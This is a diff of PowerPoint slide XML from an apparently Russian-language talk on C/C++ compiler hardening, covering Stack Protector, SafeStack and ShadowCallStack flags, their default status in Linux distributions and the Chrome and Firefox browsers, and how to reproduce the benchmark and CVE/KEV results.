-              <a:t>https://github.com/mozilla-firefox/firefox</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>коммит </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>b0ca903b</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>https://chromium.googlesource.com/chromium/src</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>коммит </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>d0273f3d</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Замеры производительности </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Компилировали </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp c -O2 (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>самый большой файл)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/bench</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Подсчёт</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> CVE/KEV</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>-метрик</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/scripts</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пруфлинки и дополнительная информация доступны в файле</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId6"/>
-              </a:rPr>
-              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/plan.md</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -33523,7 +33356,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DD3E67F-01FC-47C1-BE9B-97F0109DAF0E}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF2943A-E379-4742-8C1A-0BAC9F109FE2}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33550,7 +33383,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2401149323"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -33582,7 +33415,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33599,17 +33432,10 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Protector: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
-            </a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Воспроизведение результатов</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -33618,7 +33444,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33631,128 +33457,198 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включен по умолчанию только в компиляторе </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu GCC</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Windows</a:t>
+              <a:t>Версии дистрибутивов</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рекомендуется явно указывать флаг </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protector-strong</a:t>
-            </a:r>
+              <a:t>Проверялись последние </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" i="1" dirty="0"/>
+              <a:t>стабильные</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> версии</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пакеты в Debian</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> Fedora</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ubuntu собираются с этим флагом</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian 12 (bookworm), Fedora 42, Ubuntu 24.04 (noble)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Версии браузеров</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://github.com/mozilla-firefox/firefox</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>коммит </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>b0ca903b</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>https://chromium.googlesource.com/chromium/src</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>коммит </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>d0273f3d</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён в релизной сборке </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>включён слабый вариант </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Protector</a:t>
+              <a:t>Замеры производительности </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Компилировали </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CGBuiltin.cpp c -O2 (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>самый большой файл)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/bench</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Подсчёт</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> CVE/KEV</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>-метрик</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/scripts</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пруфлинки и дополнительная информация доступны в файле</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId6"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/plan.md</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -33762,7 +33658,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7662A858-B371-4A36-A1C4-9B73D86F1E18}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DD3E67F-01FC-47C1-BE9B-97F0109DAF0E}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33789,7 +33685,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293187664"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -33821,7 +33717,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495A52BD-3FC7-4579-8A9D-D005960A9C1C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33839,7 +33735,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Safe Stack: </a:t>
+              <a:t>Stack Protector: </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -33857,7 +33753,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AA46AE-2AEA-42A0-B331-598916A3F385}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33870,28 +33766,58 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
+          <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Несколько реализаций:</a:t>
+              <a:t>Включен по умолчанию только в компиляторе </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Windows</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>SafeStack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рекомендуется явно указывать флаг </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
@@ -33902,141 +33828,67 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=safe-stack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>наиболее распространённый флаг)</a:t>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protector-strong</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пакеты в Debian</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> Fedora</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Ubuntu собираются с этим флагом</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Intel CET Shadow Stack:</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> не реализован (нельзя включить ни по</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fcf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protection</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>ни по </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>–</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>mshstk</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ShadowCallStack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=shadow-call-stack</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Защита не включена по умолчанию в дистрибутивах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и браузерах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome/Firefox</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён в релизной сборке </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>включён слабый вариант </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Protector</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -34045,7 +33897,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8A2AE2-629B-42FD-9E28-E4A1D19A5BF3}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7662A858-B371-4A36-A1C4-9B73D86F1E18}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34072,7 +33924,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1796431697"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293187664"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -34104,7 +33956,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495A52BD-3FC7-4579-8A9D-D005960A9C1C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34122,11 +33974,11 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Clashing: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как использовать</a:t>
+              <a:t>Safe Stack: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -34140,7 +33992,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
